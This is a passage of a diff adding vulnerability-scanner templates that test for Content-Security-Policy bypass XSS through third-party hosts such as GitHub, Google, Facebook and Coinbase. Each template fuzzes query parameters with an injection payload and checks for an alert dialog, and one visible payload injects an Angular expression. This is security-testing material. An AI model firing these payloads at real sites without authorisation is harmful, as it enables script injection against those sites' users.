RootURL)}}" + + - action: waitload + + - action: waitdialog + name: getdrip_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "getdrip_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml new file mode 100644 index 00000000000..0caea41160b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml @@ -0,0 +1,55 @@ +id: gist-github-csp-xss + +info: + name: Content-Security-Policy Bypass via GitHub Gist + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,github + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: gist_github_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "gist_github_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml new file mode 100644 index 00000000000..fe55a22448f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: github-api-csp-xss + +info: + name: Content-Security-Policy Bypass via GitHub API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,github + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: github_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "github_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml b/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml new file mode 100644 index 00000000000..bd6d7f40e97 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml @@ -0,0 +1,55 @@ +id: global-apis-naver-csp-xss + +info: + name: Content-Security-Policy Bypass via Naver APIs + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,naver + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: global_apis_naver_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "global_apis_naver_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml b/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml new file mode 100644 index 00000000000..616a1a9eb54 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml @@ -0,0 +1,55 @@ +id: go-dev-csp-xss + +info: + name: Content-Security-Policy Bypass via Go.dev + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,golang + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: go_dev_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "go_dev_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml new file mode 100644 index 00000000000..ae14d7c3977 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml @@ -0,0 +1,55 @@ +id: go-snyk-csp-xss + +info: + name: Content-Security-Policy Bypass via Snyk + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,snyk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: go_snyk_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "go_snyk_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml new file mode 100644 index 00000000000..10c39f77bac --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml @@ -0,0 +1,55 @@ +id: google-accounts-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Accounts + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: google_accounts_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "google_accounts_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml new file mode 100644 index 00000000000..f4646ed44b6 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml @@ -0,0 +1,55 @@ +id: google-ajax-csp-xss + +info: + name: Content-Security-Policy Bypass via Google AJAX + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: google_ajax_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "google_ajax_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml new file mode 100644 index 00000000000..2108c8e9340 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml @@ -0,0 +1,55 @@ +id: google-analytics-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Analytics + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google-analytics + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: google_analytics_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "google_analytics_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml new file mode 100644 index 00000000000..afeb3eac91c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml @@ -0,0 +1,56 @@ +id: google-apis-csp-xss + +info: + name: Content-Security-Policy Bypass via Google APIs + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: google_apis_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "google_apis_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml new file mode 100644 index 00000000000..afc73573aa4 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml @@ -0,0 +1,55 @@ +id: graph-facebook-csp-xss + +info: + name: Content-Security-Policy Bypass via Facebook Graph API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,facebook + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: graph_facebook_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "graph_facebook_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml new file mode 100644 index 00000000000..8197cc4c4d5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml @@ -0,0 +1,55 @@ +id: grubhub-assets-csp-xss + +info: + name: Content-Security-Policy Bypass via Grubhub Assets + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,grubhub + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: grubhub_assets_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "grubhub_assets_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml new file mode 100644 index 00000000000..ada648006e0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml @@ -0,0 +1,55 @@ +id: gstatic-angular-csp-xss + +info: + name: Content-Security-Policy Bypass via Gstatic Angular JS Bundle + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: gstatic_angular_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "gstatic_angular_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..063e6aac69c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml @@ -0,0 +1,55 @@ +id: gstatic-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via Gstatic ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: gstatic_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "gstatic_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml new file mode 100644 index 00000000000..0a69a663751 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: gum-criteo-csp-xss + +info: + name: Content-Security-Policy Bypass via Criteo Gum + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,criteo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: gum_criteo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "gum_criteo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml new file mode 100644 index 00000000000..397bf5aa222 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml @@ -0,0 +1,55 @@ +id: hatenaapis-bookmark-csp-xss + +info: + name: Content-Security-Policy Bypass via Hatenaapis Bookmark + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hatenaapis + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: hatenaapis_bookmark_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "hatenaapis_bookmark_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml new file mode 100644 index 00000000000..3e7e3c6cabb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml @@ -0,0 +1,55 @@ +id: hcaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via hCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hcaptcha + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: hcaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "hcaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml new file mode 100644 index 00000000000..73c3eb981b2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml @@ -0,0 +1,55 @@ +id: help-afterpay-csp-xss + +info: + name: Content-Security-Policy Bypass via Afterpay Help + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,afterpay + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: help_afterpay_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "help_afterpay_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml new file mode 100644 index 00000000000..b5a911fa093 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ib-adnxs-csp-xss + +info: + name: Content-Security-Policy Bypass via AppNexus + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,adnxs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ib_adnxs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ib_adnxs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml new file mode 100644 index 00000000000..5879e3da6c1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml @@ -0,0 +1,55 @@ +id: info-cloudflare-csp-xss + +info: + name: Content-Security-Policy Bypass via Cloudflare Info + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudflare + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: info_cloudflare_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "info_cloudflare_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml new file mode 100644 index 00000000000..5bc836a2192 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml @@ -0,0 +1,55 @@ +id: info-elastic-csp-xss + +info: + name: Content-Security-Policy Bypass via Elastic Info + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,elastic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: info_elastic_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "info_elastic_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml new file mode 100644 index 00000000000..5fedee67ae4 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml @@ -0,0 +1,55 @@ +id: inno-blob-core-csp-xss + +info: + name: Content-Security-Policy Bypass via Azure Blob Storage + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,azure + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
foo
{{ [1].reduce(value.alert, 1); }}
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: inno_blob_core_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "inno_blob_core_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml new file mode 100644 index 00000000000..af67727c77e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml @@ -0,0 +1,55 @@ +id: investor-coinbase-csp-xss + +info: + name: Content-Security-Policy Bypass via Coinbase Investor + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,coinbase + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: investor_coinbase_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "investor_coinbase_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml new file mode 100644 index 00000000000..b0ed307cdd2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ipify-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Ipify API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ipify + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ipify_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ipify_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml new file mode 100644 index 00000000000..5f64443de19 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ipinfo-csp-xss + +info: + name: Content-Security-Policy Bypass via IPInfo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ipinfo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ipinfo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ipinfo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml new file mode 100644 index 00000000000..5ddecf3ae24 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml @@ -0,0 +1,55 @@ +id: itunes-apple-csp-xss + +info: + name: Content-Security-Policy Bypass via iTunes + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,itunes + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: itunes_apple_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "itunes_apple_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml new file mode 100644 index 00000000000..06187ab405f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: jd-api-csp-xss + +info: + name: Content-Security-Policy Bypass via JD API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,jd + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: jd_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "jd_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml 